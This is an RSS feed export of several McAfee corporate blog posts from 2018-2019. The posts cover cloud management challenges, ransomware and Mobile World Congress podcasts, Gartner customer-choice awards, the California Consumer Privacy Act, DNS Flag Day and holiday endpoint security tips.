The post Cloud 101: Navigating the Top 5 Cloud Management Challenges appeared first on McAfee Blogs.

]]>

Cloud management is a critical topic that organizations are looking at to simplify operations, increase IT efficiency, and reduce costs. Although cloud adoption has risen in the past few years, some organizations aren’t seeing the results they’d envisioned. That’s why we’re sharing a few of the top cloud management challenges enterprises need to be cautious of and how to overcome them.

Cloud Management Challenge #1: Security

Given the overall trend toward migrating resources to the cloud, a rise in security threats shouldn’t be surprising. Per our latest Cloud Risk and Adoption Report, the average enterprise organization experiences 31.3 cloud related security threats each month—a 27.7% increase over the same period last year. Broken down by category, these include insider threats (both accidental and malicious), privileged user threats, and threats arising from potentially compromised accounts.

To mitigate these types of cloud threats and risks, we have a few recommendations to better protect your business. Start with auditing your Amazon Web Services, Microsoft Azure, Google Cloud Platform, or other IaaS/PaaS configurations to get ahead of misconfigurations before they open a hole in the integrity of your security posture. Second, it’s important to understand which cloud services hold most of your sensitive data. Once that’s determined, extend data loss prevention (DLP) policies to those services, or build them in the cloud if you don’t already have a DLP practice. Right along with controlling the data itself goes controlling who the data can go to, so lock down sharing where your sensitive data lives.

Cloud Management Challenge #2: Governance

Many companies deploy cloud systems without an adequate governance plan, which increases the risk of security breaches and inefficiency. Lack of data governance may result in a serious financial loss, and failing to protect sensitive data could result in a data breach.

Cloud management and cloud governance are often interlinked. Keeping track of your cloud infrastructure is essential. Governance and infrastructure planning can help mitigate certain infrastructure risks, therefore, automated cloud discovery and governance tools will help your business safeguard operations.

Cloud Management Challenge #3: Proficiency

You may also be faced with the challenge of ensuring that IT employees have the proper expertise to manage their services in a cloud environment. You may need to decide to either hire a new team that is already familiar with cloud environments or train your existing staff.

In the end, training your existing staff is less expensive, scalable, and faster. Knowledge is key when transforming your business and shifting your operational model to the cloud. Accept the challenge and train your employees, give them hands-on time, and get them properly certified. For security professionals, the Cloud Security Alliance is a great place to start for training programs.

Cloud Management Challenge #4: Performance

Enterprises are continually looking for ways to improve their application performance, and internal/external SLAs. However, even in the cloud, they may not immediately achieve these benefits. Cloud performance is complex and if you’re having performance issues it’s important to look at a variety of issues that could be occurring in your environment.

How should you approach finding and fixing the root causes of cloud performance issues? Check your infrastructure and the applications themselves. Examine the applications you ported over from on-premises data centers, and evaluate whether newer, cloud technologies such as containers or serverless computing could replace some of your application components and improve performance. Also, evaluate multiple cloud providers for your application or infrastructure needs, as each have their own offerings and geographic distribution.

Cloud Management Challenge #5: Cost

Managing cloud costs can be a challenge, but in general, migrating to the cloud offers companies enormous savings. We see organizations investing more dollars in the cloud to bring greater flexibility to their enterprise, allowing them to quickly and efficiently react to the changing market conditions. Organizations are moving more of their services to the cloud, which is resulting in higher spend with cloud service providers.

Shifting IT cost from on-premises to the cloud on its own is not the challenge – it is the unmonitored sprawl of cloud resources that typically spikes cost for organizations. Managing your cloud costs can be simple if you effectively monitor use. With visibility into unsanctioned, “Shadow” cloud use, your organization can find the areas where there is unnecessary waste of resources. By auditing your cloud usage, you may even determine new ways to manage cost, such as re-architecting your workloads using a PaaS architecture, which may be more cost-effective.

Final Thoughts

Migrating to the cloud is a challenge but can bring a wide range of benefits to your organization with a reduction in costs, unlimited scalability, improved security, and overall a faster business model. These days, everyone is in the cloud but that doesn’t mean your business’s success should be hindered by the common challenges of cloud management.

For more on how to secure your cloud environment, check out McAfee MVISION Cloud, a cloud access security broker (CASB) that protects data where it lives with a solution that was built natively in the cloud, for the cloud.

 

The post Cloud 101: Navigating the Top 5 Cloud Management Challenges appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/cloud-security/cloud-101-navigating-the-top-5-cloud-management-challenges/feed/ 0
ST04: Ransomware Trends with Raj Samani and John Fokker https://securingtomorrow.mcafee.com/other-blogs/podcast/st04-ransomware-trends-with-raj-samani-and-john-fokker/ https://securingtomorrow.mcafee.com/other-blogs/podcast/st04-ransomware-trends-with-raj-samani-and-john-fokker/#respond Tue, 23 Apr 2019 22:54:20 +0000 https://securingtomorrow.mcafee.com/?p=94993

Raj Samani, Chief Scientist and McAfee Fellow, and John Fokker, Head of Cyber Investigations for McAfee Advanced Threat Research, discuss various ransomware attacks and how it’s evolving.

The post ST04: Ransomware Trends with Raj Samani and John Fokker appeared first on McAfee Blogs.

]]>

Raj Samani, Chief Scientist and McAfee Fellow, and John Fokker, Head of Cyber Investigations for McAfee Advanced Threat Research, discuss various ransomware attacks and how it’s evolving.

The post ST04: Ransomware Trends with Raj Samani and John Fokker appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/podcast/st04-ransomware-trends-with-raj-samani-and-john-fokker/feed/ 0
ST02: Mobile World Congress 2019 Recap with Gary Davis https://securingtomorrow.mcafee.com/other-blogs/trusted-advisor/st02-mobile-world-congress-2019-recap-with-gary-davis-2/ https://securingtomorrow.mcafee.com/other-blogs/trusted-advisor/st02-mobile-world-congress-2019-recap-with-gary-davis-2/#respond Wed, 13 Mar 2019 16:49:41 +0000 https://securingtomorrow.mcafee.com/?p=94595

Our Chief Consumer Evangelist, Gary Davis, joins us in discussing the recent Mobile World Congress 2019 on his and McAfee’s views ranging from trending themes from the show to McAfee key announcements and goals.

The post ST02: Mobile World Congress 2019 Recap with Gary Davis appeared first on McAfee Blogs.

]]>

Our Chief Consumer Evangelist, Gary Davis, joins us in discussing the recent Mobile World Congress 2019 on his and McAfee’s views ranging from trending themes from the show to McAfee key announcements and goals.


The post ST02: Mobile World Congress 2019 Recap with Gary Davis appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/trusted-advisor/st02-mobile-world-congress-2019-recap-with-gary-davis-2/feed/ 0
ST02: Mobile World Congress 2019 Recap with Gary Davis https://securingtomorrow.mcafee.com/other-blogs/podcast/st02-mobile-world-congress-2019-recap-with-gary-davis/ https://securingtomorrow.mcafee.com/other-blogs/podcast/st02-mobile-world-congress-2019-recap-with-gary-davis/#respond Mon, 11 Mar 2019 17:46:59 +0000 https://securingtomorrow.mcafee.com/?p=94538

Our Chief Consumer Evangelist, Gary Davis, joins us in discussing the recent Mobile World Congress 2019 on his and McAfee’s views ranging from trending themes from the show to McAfee key announcements and goals.

The post ST02: Mobile World Congress 2019 Recap with Gary Davis appeared first on McAfee Blogs.

]]>

Our Chief Consumer Evangelist, Gary Davis, joins us in discussing the recent Mobile World Congress 2019 on his and McAfee’s views ranging from trending themes from the show to McAfee key announcements and goals.

The post ST02: Mobile World Congress 2019 Recap with Gary Davis appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/podcast/st02-mobile-world-congress-2019-recap-with-gary-davis/feed/ 0
Kicking off 2019 with Recognition Across the McAfee Portfolio https://securingtomorrow.mcafee.com/business/kicking-off-2019-with-recognition-across-the-mcafee-portfolio/ https://securingtomorrow.mcafee.com/business/kicking-off-2019-with-recognition-across-the-mcafee-portfolio/#respond Tue, 12 Feb 2019 14:00:01 +0000 https://securingtomorrow.mcafee.com/?p=94143

It’s always great to start out a new year with recognition from our industry. We hear over and over from our customers that they are looking for us to help them overcome the complexity challenges that are inherent in building a resilient enterprise. This requires partnering with a vendor that delivers excellence across a multitude […]

The post Kicking off 2019 with Recognition Across the McAfee Portfolio appeared first on McAfee Blogs.

]]>

It’s always great to start out a new year with recognition from our industry. We hear over and over from our customers that they are looking for us to help them overcome the complexity challenges that are inherent in building a resilient enterprise. This requires partnering with a vendor that delivers excellence across a multitude of technologies. Excellence that we believe is validated by our larger peer and analyst community.

We’ve just announced that McAfee was named a Gartner Peer Insights Customers’ Choice for another two technologies. Our customers have recognized us as a January 2019 Gartner Peer Insights Customers’ Choice for Secure Web Gateway for McAfee Web Protection, McAfee Web Gateway, and McAfee WebGateway Cloud Service. In addition, for the second year in a row McAfee’s MVISION Cloud (formerly McAfee Skyhigh Security Cloud) was named a January 2019 Gartner Peer Insights Customers’ Choice for Cloud Access Security Brokers. In 2018, McAfee was the only vendor named a Customers’ Choice in the Cloud Access Security Brokers market.

Our team at McAfee takes great pride in these distinctions, as customer feedback is essential in shaping our products and services. We put our customers at the core of everything we do and this shows pervasively across our portfolio. We believe our position as a Gartner Peer Insights Customers’ Choice for Secure Web Gateway, Data Loss Prevention, SIEM, Endpoint Protection and Cloud Access Security Broker (CASB) is a testament to the strength of our device-to-cloud strategy. This adds up to recognition’s in the last year in five different markets.

We also think it’s a signal of the way enterprises are approaching security – with the innovative technology solutions and integrated strategies that must evolve to fight a threat that is constantly evolving, too.

The post Kicking off 2019 with Recognition Across the McAfee Portfolio appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/kicking-off-2019-with-recognition-across-the-mcafee-portfolio/feed/ 0
Australian Cybersecurity Firm Experiences Exciting Times as Clients’ Shift to Cloud Accelerates https://securingtomorrow.mcafee.com/business/australian-cybersecurity-firm-experiences-exciting-times-as-clients-shift-to-cloud-accelerates/ https://securingtomorrow.mcafee.com/business/australian-cybersecurity-firm-experiences-exciting-times-as-clients-shift-to-cloud-accelerates/#respond Tue, 05 Feb 2019 15:00:38 +0000 https://securingtomorrow.mcafee.com/?p=93996

Patrick Butler, CEO of the Australian cybersecurity firm Loop Secure, is excited about how the cloud is growing his business. His clients are enthused too by the tremendous opportunities and advantages the cloud presents. They’re also a little scared. “Every year more companies are digitizing all aspects of their business—from manufacturing plants coming online to […]

The post Australian Cybersecurity Firm Experiences Exciting Times as Clients’ Shift to Cloud Accelerates appeared first on McAfee Blogs.

]]>

Patrick Butler, CEO of the Australian cybersecurity firm Loop Secure, is excited about how the cloud is growing his business. His clients are enthused too by the tremendous opportunities and advantages the cloud presents. They’re also a little scared.

“Every year more companies are digitizing all aspects of their business—from manufacturing plants coming online to new ways of serving up information to customers,” says Butler, whose firm provides a full range of cybersecurity services, from one-time red team engagements to managing security operations, primarily for midsize enterprises. “It’s exciting what technology can do to transform what we do with computers. … We’re seeing a huge uptake in collaboration technology, with a lot of customers moving to AWS [Amazon Web Services].”

But Butler acknowledges his clients’ fears—putting sensitive data in the cloud introduces new risks. “Our job is to help customers leverage digital transformation positively without having to worry about the risks, [such as] breaches and brand reputation damage,” he says. “We’ve had to focus on how we protect them in [the cloud and] those areas of their business—areas that have traditionally been quite dark.”

The Challenge of Securing the Cloud

“Setting up security for the cloud can be quite technical,” Butler explains. “There are a lot of configuration options. … Yes, the cloud brings a lot of speed and scale, but one wrong configuration and suddenly you have an AWS S3 bucket available to the broader public with all of your confidential information on it. The cloud brings benefits, but it also brings new and different risks.”

Confidently Securing the Cloud with Help from McAfee

As one of the longest-running cybersecurity companies in Australia, Loop Secure has been a McAfee partner for over a decade. For its clients moving operations into the cloud, the firm primarily uses McAfee solutions to help them reach their security objectives—easily and effectively. For instance, for a midsize services client, Loop Secure implemented McAfee® Virtual Network Security Platform (McAfee vNSP), a complete network threat and intrusion prevention system (IPS) built for the unique demands of private and public clouds. Using McAfee vNSP allowed the company to apply the same robust security policies to endpoints within AWS as on premises.

“What McAfee brings to the table is a comprehensive portfolio, scale, and focus,” Butler explains. “Like us, McAfee focuses only on cybersecurity. That’s important. … To us, the McAfee ‘Together is Power’ mantra means that with McAfee we have a broader team—our people plus McAfee people and products—all dedicated to keeping our clients’ data and environments safe.”

Many of Butler’s clients use McAfee endpoint, networking, and/or web protection solutions and McAfee ePolicy Orchestrator® (McAfee ePO™). In the near future, Butler looks forward to offering them McAfee MVISION, an innovative, integrated, open system from device to cloud. McAfee MVISION could simplify security for these Loop Secure customers by providing consolidated visibility, comprehension, and control across their entire digital estate.

With the acceleration of cloud adoption by its clients and McAfee’s device-to-cloud approach, “The future’s pretty exciting for both us and McAfee,” Butler says.

View below for a short video interview with Patrick Butler. Get your questions answered by tweeting @McAfee_Business.

The post Australian Cybersecurity Firm Experiences Exciting Times as Clients’ Shift to Cloud Accelerates appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/australian-cybersecurity-firm-experiences-exciting-times-as-clients-shift-to-cloud-accelerates/feed/ 0
California Consumer Privacy Act https://securingtomorrow.mcafee.com/business/california-consumer-privacy-act/ https://securingtomorrow.mcafee.com/business/california-consumer-privacy-act/#respond Mon, 04 Feb 2019 14:00:17 +0000 https://securingtomorrow.mcafee.com/?p=93964

This blog was written by Gerald Jones Jr. More sweeping privacy law changes are on the horizon as California law overhauls consumer protection and privacy rights. Shortly after the European Union’s watershed General Data Protection Regulation (GDPR) enforcement began on May 25, 2018, California passed its own privacy bill, the California Consumer Privacy Act of […]

The post California Consumer Privacy Act appeared first on McAfee Blogs.

]]>

This blog was written by Gerald Jones Jr.

More sweeping privacy law changes are on the horizon as California law overhauls consumer protection and privacy rights.

Shortly after the European Union’s watershed General Data Protection Regulation (GDPR) enforcement began on May 25, 2018, California passed its own privacy bill, the California Consumer Privacy Act of 2018 (CCPA), in June. Amid pressure to act or swallow a more stringent bill initiated by a private California resident, the CCPA broadens the scope of privacy rights for Californians. It includes data access rights and a limited private right of action, or the right to file a lawsuit.

The CCPA takes effect in January 2020 (or July 2020, if the California Attorney General implements additional regulations) and is widely regarded as the foremost privacy law in the United States. Yet the CCPA may have broader implications. The range of companies falling within the Act’s scope, i.e., not just the usual suspects in the technology industry, might pressure Congress into enacting a federal privacy regime, which would pre-empt the CCPA.

The Act grants consumers greater control over their personally identifiable information and prods companies doing business in the state to prioritize the practice of sound data governance. Here are some key takeaways under the CCPA:

  • It impacts companies doing business in California that meet one of the following thresholds:
    • Has annual gross revenues greater than $25 million; or
    • Receives or shares the personal information of 50,000 or more California consumers for monetary or other valuable consideration; or
    • Receives 50% or more of its annual revenue from selling consumer personal information.
  • “Personal Information now explicitly includes IP addresses, geolocation data, and unique identifiers such as cookies, beacons, pixel tags, browsing history, and another electronic network information. Consumer Information includes information that relates to households.
  • The California Attorney General will enforce the law, though Californians have a private right of action limited to circumstances where there is an unauthorized access to nonencrypted personal information or “disclosure of personal information because of a business failure to implement and maintain reasonable security procedures.”
  • Violators of the law are subject to civil penalties of up $2500 per each unintentional violation—failing to cure a violation within 30 days of receiving noncompliance notification from the California Attorney General—and a maximum of $7,500 for each intentional violation (not acknowledging the request for data, for example) if the civil action is brought by the California Attorney General.

What Does This All Mean?

Regulators are working on guidance, and there is still time for amendments to be made on the law, so things might change before the law goes into effect. Residents of the European Economic Area have been exercising their data subject access rights since late May. Now, Californians will join them in being able to similarly ask about the data that CCPA-applicable companies hold about them. The CCPA gives companies a 45-day window to comply with an individual’s request for access to data or deletion (a Data Subject Access Request, or DSAR) in contrast to the GDPR’s 30 days.

Companies may need to prepare for an increase in DSARs and implement new features to comply with the law, like providing two communication methods for consumers electing to exercise their rights (web portal, email address, toll free telephone number, or another viable mode of communication) and provide a conspicuous link on the company’s website that informs the consumer of her CCPA rights.

The California Legislature’s reference to Cambridge Analytica makes it apparent that legislators expect businesses to exercise transparency in their consumer data use practices. Even without legislative nudging, companies are slowly recognizing value in sound privacy and data governance practices. Companies no longer see privacy as a mere compliance checkbox, but instead as a competitive advantage that simultaneously builds consumer confidence.

We may see more changes to the California law, and we likely will see other laws come in to play both in the United States and abroad (Brazil, China, India, etc.), but companies with privacy in their DNA will have an edge over companies scrambling to meet compliance efforts.

The post California Consumer Privacy Act appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/california-consumer-privacy-act/feed/ 0
What You Need to Know About DNS Flag Day https://securingtomorrow.mcafee.com/business/what-you-need-to-know-about-dns-flag-day/ Thu, 31 Jan 2019 17:37:02 +0000 https://securingtomorrow.mcafee.com/?p=94009

This blog was written by Michael Schneider, Lead Product Manger. The internet is built on Postel’s law, often referred to as the robustness principle: “Be conservative in what you do, be liberal in what you accept from others.” In the protocol world, this means that receivers will try to accept and interpret data that they receive […]

The post What You Need to Know About DNS Flag Day appeared first on McAfee Blogs.

]]>

This blog was written by Michael Schneider, Lead Product Manger.

The internet is built on Postel’s law, often referred to as the robustness principle: “Be conservative in what you do, be liberal in what you accept from others.” In the protocol world, this means that receivers will try to accept and interpret data that they receive to their best knowledge and will be flexible if the data doesn’t fully match a specification. Senders should adhere to specifications and comply with protocol specifications, as laid out in Request for Comment documents (RFCs) by the Internet Engineering Task Force.

DNS was released as RFC 1035 in 1987 and was superseded by EDNS in 1999 with RFCs 2671 and 6891. EDNS, or extension mechanisms for DNS, aimed to flexibly deploy new features into the DNS protocol, including protection against DNS flooding attacks amongst other performance and security enhancements. These attacks can cause a major outage for cloud-based infrastructure, which happened in 2016 with the DDoS attack on DNS provider Dyn.

To avoid such attacks and improve DNS efficiency, several DNS software and service providers—like Google, Cisco, and Cloudflare—have agreed to “coordinate removing accommodations for non-compliant DNS implementations from their software or service,” beginning Feb. 1, 2019, or DNS Flag Day.

Before DNS Flag Day, if an EDNS server requested a name resolution from a non-EDNS resolver, it would first send an EDNS query. If there was no response, the server would then send a legacy DNS query. That means that the timeout for the first query would need to be reached before the legacy DNS query was sent, generating a delayed response. These delays ultimately make DNS operations less efficient.

But with the new changes introduced for DNS Flag Day, any DNS server that doesn’t respond to EDNS will be seen as “dead” and no additional DNS query will be sent to that server. The result? Certain domains or offerings may no longer be available, as name resolution will fail. Organizations should plan to provide a bridge between their internal DNS and a provider’s DNS to ensure that the EDNS protocol is used. They should also work with their vendors to verify that EDNS is part of DNS communication and obtain a version of the respective product that complied with the requirements of EDNS.

The DNS Flag Day protocols are a disruptive move, as they break from Postel’s law—servers can no longer automatically accept every query. But as with most internet-related innovations, progress requires a little disruption.

The post What You Need to Know About DNS Flag Day appeared first on McAfee Blogs.

]]>
McAfee 2018: Year in Review https://securingtomorrow.mcafee.com/business/mcafee-2018-year-in-review/ https://securingtomorrow.mcafee.com/business/mcafee-2018-year-in-review/#respond Fri, 28 Dec 2018 18:37:54 +0000 https://securingtomorrow.mcafee.com/?p=93538

2018 was an eventful year for all of us at McAfee. It was full of discovery, innovation, and progress—and we’re thrilled to have seen it all come to fruition. Before we look ahead to what’s in the pipeline for 2019, let’s take a look back at all the progress we’ve made this year and see how McAfee […]

The post McAfee 2018: Year in Review appeared first on McAfee Blogs.

]]>

2018 was an eventful year for all of us at McAfee. It was full of discovery, innovation, and progress—and we’re thrilled to have seen it all come to fruition. Before we look ahead to what’s in the pipeline for 2019, let’s take a look back at all the progress we’ve made this year and see how McAfee events, discoveries, and product announcements have affected, educated, and assisted users and enterprises everywhere.

MPOWERing Security Professionals Around the World

Every year, security experts gather at MPOWER Cybersecurity Summit to strategize, network, and learn about innovative ways to ward off advanced cyberattacks. This year was no different, as innovation was everywhere at MPOWER Americas, APAC, Japan, and EMEA. At the Americas event, we hosted Partner Summit, where head of channel sales and operations for the Americas, Ken McCray, discussed the program, products, and corporate strategy. Partners had the opportunity to dig deeper into this information through several Q&A sessions throughout the day. MPOWER Americas also featured groundbreaking announcements, including McAfee CEO Chris Young’s announcement of the latest additions to the MVISION product family: MVISION® Endpoint Detection and Response (MVISION EDR) and MVISION® Cloud.

ATR Analysis

This year was a prolific one, especially for our Advanced Threat Research team, which unveiled discovery after discovery about the threat landscape, from ‘Operation Oceansalt’ delivering five distinct waves of attacks on victims, to Triton malware spearheading the latest attacks on industrial systems, to GandCrab ransomware evolving rapidly, to the Cortana vulnerability. These discoveries not only taught us about cybercriminal techniques and intentions, but they also helped us prepare ourselves for potential threats in 2019.

Progress via Products

2018 wouldn’t be complete without a plethora of product updates and announcements, all designed to help organizations secure crucial data. This year, we were proud to announce McAfee MVISION®, a collection of products designed to support native security controls and third-party technologies.

McAfee MVISION® Endpoint orchestrates the native security controls in Windows 10 with targeted advanced threat defenses in a unified management workflow to visualize and investigate threats, understand compliance, and pivot to action. McAfee MVISION®  Mobile protects against threats on Android and iOS devices. McAfee MVISION® ePO, a SaaS service, is designed to eliminate complexity by elevating management above the specific threat defense technologies with simple, intuitive workflows for security threat and compliance control across devices.

Beyond that, many McAfee products were updated to help security teams everywhere adapt to the ever-evolving threat landscape, and some even took home awards for their excellence.

All in all, 2018 was a great year. But, as always with cybersecurity, there’s still work to do, and we’re excited to work together to create a secure 2019 for everyone.

To learn more about McAfee, be sure to follow us at @McAfee and @McAfee_Business.

The post McAfee 2018: Year in Review appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/mcafee-2018-year-in-review/feed/ 0
Giving Your Endpoint the Gift of Security This Holiday Season https://securingtomorrow.mcafee.com/business/endpoint-security/giving-your-endpoint-the-gift-of-security-this-holiday-season/ https://securingtomorrow.mcafee.com/business/endpoint-security/giving-your-endpoint-the-gift-of-security-this-holiday-season/#respond Tue, 18 Dec 2018 14:00:18 +0000 https://securingtomorrow.mcafee.com/?p=93238

Suddenly, it’s December, and the beginning of the holiday season. Your coworkers are now distracted with getting in their PTO, flying home to be with family, and completing their shopping lists. But the holiday season isn’t always filled with cheer, it’s got some scrooges too – cybercriminals, who hope to take advantage of the festive […]

The post Giving Your Endpoint the Gift of Security This Holiday Season appeared first on McAfee Blogs.

]]>

Suddenly, it’s December, and the beginning of the holiday season. Your coworkers are now distracted with getting in their PTO, flying home to be with family, and completing their shopping lists. But the holiday season isn’t always filled with cheer, it’s got some scrooges too – cybercriminals, who hope to take advantage of the festive fun to find vulnerabilities and infect unsecured devices. And with many employees out of office, these hackers could potentially pose a serious threat to an organization’s endpoints, and thereby its network. As a matter of fact, there are a few key reasons as to why your organization’s endpoints may be in danger during the holidays. Let’s take a look.

Business Shutdowns

Most companies close down for a handful of days during the holidays, if not a full week or two. That means less people manning the IT station, executing updates, and defending the network if cybercriminals manage to find a way inside. A lack of personnel could be just the opportunity cybercriminals need to take advantage of an open entry point and swoop data from an organization essentially undetected.

Holiday Spirit, Relaxed Attitude

For the employees that do stay online during the holidays, attitudes can range from relaxed to inattentive. Unless their product or service directly relates to the holidays and shopping, businesses tend to be quiet during this time. And with many coworkers out, employees tend to have less reason to be glued to their computer all the time. This could mean cyberattacks or necessary security actions go unattended – irregular activity may not seem as obvious or a necessary software update could go unresolved a little too long. What’s more – the lax attitude could potentially lead to a successful phishing attack. In fact, phishing scams are said to ramp up starting in October, as these cybercriminals are eager to time their tricks with the holiday season. In order to accurately identify a phishing scheme, users have to be aware and have their eyes on their inbox at all times. One false move could potentially expose the entire organization, creating a huge problem for the reduced staff on hand.

Holiday Travel = Public Wi-Fi

Workplace mobility is a great new aspect of the modern age – it permits employees more flexibility and allows them to work from essentially anywhere in the world. But if employees are working out of a public space – such as a coffee shop or an airport – they are likely using public Wi-Fi, which is one of the most common attack vectors for cybercriminals today. That’s because there are flaws in the encryption standards that secure Wi-Fi networks and cybercriminals can leverage these to hack into a network and intercept or infect users’ traffic. If an employee is traveling home for the holidays and using public Wi-Fi to get work done while they do, they could potentially expose any private company information that lies within their device.

BYOD in Full Force

Speaking of modern workplace policies, Bring Your Own Device (or BYOD) – a program that allows employees to bring their own personal devices into work – is a common phenomenon these days. With this program, employees’ personal devices connect to the business’ network to work and likely access company data.

That means there is crucial data living on these personal devices, which could be jeopardized when the devices travel outside of the organization. With the holidays, these devices are likely accompanying the employees on their way to visit family, which means they could be left at an airport or hotel. Beyond that, these employees are more likely to access emails and company data through these mobile devices while they are out of the office. And with more connected devices doing company business, there are simply more chances for device and/or data theft.

Staying Secure While Staying Festive

Now, no one wants their employees to be online all the time during the holidays. Fortunately, there are actions organizations can take to ensure their employees and their network are merry and bright, as well as secure. First and foremost, conduct some necessary security training. Put every employee through security training courses so they’re aware of the risks of public Wi-Fi and are reminded to be extra vigilant of phishing emails during this time. Then, make sure all holes are patched and every update has been made before everyone turns their attention to yuletide festivities. Lastly, if an employee is working remotely – remind them to always use a VPN.

No matter who’s in the office and who’s not, it’s important to have always-on security that is armed for the latest zero-day exploits – like McAfee Endpoint Security. You can’t prevent every user from connecting to a public network or one that is set up for phishing, but you can ensure they have an active defense that takes automatic corrective actions. That way, employees can enjoy the time off and return to a safe and secure enterprise come the new year.

To learn more about endpoint security and McAfee’s strategies for it, be sure to follow us at @McAfee and @McAfee_Business.

 

The post Giving Your Endpoint the Gift of Security This Holiday Season appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/endpoint-security/giving-your-endpoint-the-gift-of-security-this-holiday-season/feed/ 0
McAfee India Hosts NASSCOM’s ‘Cyber Security Gurukul’ – An Exclusive Initiative for Women Professionals https://securingtomorrow.mcafee.com/business/mcafee-india-hosts-nasscoms-cyber-security-gurukul-an-exclusive-initiative-for-women-professionals/ https://securingtomorrow.mcafee.com/business/mcafee-india-hosts-nasscoms-cyber-security-gurukul-an-exclusive-initiative-for-women-professionals/#respond Thu, 13 Dec 2018 21:28:59 +0000 https://securingtomorrow.mcafee.com/?p=93095

The Cyber Security Gurukul Series is an initiative by the ‘Women Wizards Rule Tech (W2RT)’, a unique program designed exclusively for Women professionals in Core Technologies by noted industry body NASSCOM. Focused specifically on the IT-ITES/BPM, Product and R&D Firms, the key aim of this initiative is to enable women with deeper knowledge various technologies […]

The post McAfee India Hosts NASSCOM’s ‘Cyber Security Gurukul’ – An Exclusive Initiative for Women Professionals appeared first on McAfee Blogs.

]]>

The Cyber Security Gurukul Series is an initiative by the ‘Women Wizards Rule Tech (W2RT)’, a unique program designed exclusively for Women professionals in Core Technologies by noted industry body NASSCOM. Focused specifically on the IT-ITES/BPM, Product and R&D Firms, the key aim of this initiative is to enable women with deeper knowledge various technologies and thereby nurture them as leaders for tomorrow. It is an initiative McAfee is proud to partake in, which is why on December 4th, McAfee India hosted close to 40 female professionals from many organizations, including McAfee, as a part of NASSCOM’s Cybersecurity Gurukul series.

The half a day session started with a keynote from Venkat Krishnapur, VP Engineering & Managing Director, McAfee India. Addressing the group on “Countering Emerging Threats by Building Security DNA of your Organization”, the session discussed how the exponential growth of connected devices over the past few years has made organizations and individuals prone to cyberattacks more than ever before. Venkat also covered other key topics, such as the increase in the number of cyberattacks, variety and evolution of malware, importance of cloud security in today’s day and age, and how security organizations such as McAfee invest in both technology and people

Following Venkat’s keynote session, Sandeep Kumar Singh, Security Researcher and SSA Lead, McAfee India, hosted a two-hour session for the attendees. The session touched upon various facets of “Introduction to Security Deployment Lifecycle” why it’s imperative for organizations to invest in SDL, the key ingredients of a successful security program, and a walkthrough of key SDL activities. Sandeep also spoke to the group about how choosing a career in cybersecurity will give them a competitive edge, as a shortage of professionals in this field remains a critical vulnerability for organizations and nations alike.

Overall, the event was quite the hit with attendees – as proven by demos, quizzes, and an interactive Q&A session. Sharing their feedback on the event , one of the participants said:

“The Cyber Security session which I attended today at McAfee India will go a long way in helping us enhance our knowledge and skills. The presentation given by Sandeep was excellent and the slides prepared by him were crisp and clear. We’d like to thank NASSCOM for arranging these sessions and we are looking for more such classroom sessions coming on our way.”

Sessions and programs such as these will go a long way in ensuring that organizations are helping pave way for women to enhance their skills, as well as give them an edge in their career development. McAfee is proud to play a role in influencing the overall India/APAC digital security ecosystem through it’s thought leadership.

The post McAfee India Hosts NASSCOM’s ‘Cyber Security Gurukul’ – An Exclusive Initiative for Women Professionals appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/mcafee-india-hosts-nasscoms-cyber-security-gurukul-an-exclusive-initiative-for-women-professionals/feed/ 0
McAfee Named a 2018 Gartner Peer Insights Customers’ Choice for Endpoint Protection Platforms https://securingtomorrow.mcafee.com/business/endpoint-security/mcafee-named-a-2018-gartner-peer-insights-customers-choice-for-endpoint-protection-platforms/ https://securingtomorrow.mcafee.com/business/endpoint-security/mcafee-named-a-2018-gartner-peer-insights-customers-choice-for-endpoint-protection-platforms/#respond Fri, 07 Dec 2018 17:47:10 +0000 https://securingtomorrow.mcafee.com/?p=92988

We are excited to announce that McAfee has been recognized as a 2018 Gartner Peer Insights Customers’ Choice for Endpoint Protection Platforms.  McAfee takes great pride in this distinction, as we feel that real-world feedback from our customers is the driving force behind the recognition and that they have spoken loudly about the value they […]

The post McAfee Named a 2018 Gartner Peer Insights Customers’ Choice for Endpoint Protection Platforms appeared first on McAfee Blogs.

]]>

We are excited to announce that McAfee has been recognized as a 2018 Gartner Peer Insights Customers’ Choice for Endpoint Protection Platforms.  McAfee takes great pride in this distinction, as we feel that real-world feedback from our customers is the driving force behind the recognition and that they have spoken loudly about the value they are receiving from our products.

In its announcement, Gartner explains, “Since October 2015, more than 100,000 reviews across more than 300 markets have been posted to Gartner Peer Insights. In markets where there is enough data, Gartner Peer Insights recognizes the vendors who are the most highly rated by their customers through the Customers’ Choice distinction. This peer-rated distinction can be a useful complement to expert opinion, as it focuses on direct peer experiences of implementing and operating a solution.” To ensure fair evaluation, Gartner maintains rigorous criteria for recognizing vendors.

 

 

 

For this distinction, a vendor must have a minimum of 50 approved ratings with an average overall rating of 4.2 stars or higher. McAfee received 651 reviews and an average 4.4 rating out of 5 total for the Endpoint Protection Platforms market as of November 19th, 2018.

Here are some excerpts from customers that contributed to the distinction:

“This is what an Endpoint Security Solution should look like”

 Cyber Security Analyst in the Government Industry

“McAfee ENS has been a complete game changer in the world [of] endpoint security.”

Infrastructure and Operations in the Retail Industry

“Seamless upgrade from legacy products to ENS, ePO is probably the best management console I’ve used for any product I’ve used”

Sr. Desktop Engineer in the Services Industry

And those are just a few. You can read more reviews for McAfee Endpoint Security on our web site and on the Gartner site.

On behalf of McAfee, I would like to thank all of our customers who took the time to share their experiences. We are delighted to be a 2018 Gartner Peer Insights Customers’ Choice for Endpoint Protection Platforms and we believe that it is your valuable feedback which made it possible. To learn more about this distinction, or to read the reviews written about our products by the IT professionals who use them, please visit Gartner Peer Insights Customers’ Choice announcement page.

 

  • Gartner Peer Insights’ Customers’ Choice for Endpoint Security and Protection Software announcement November 19, 2018

 

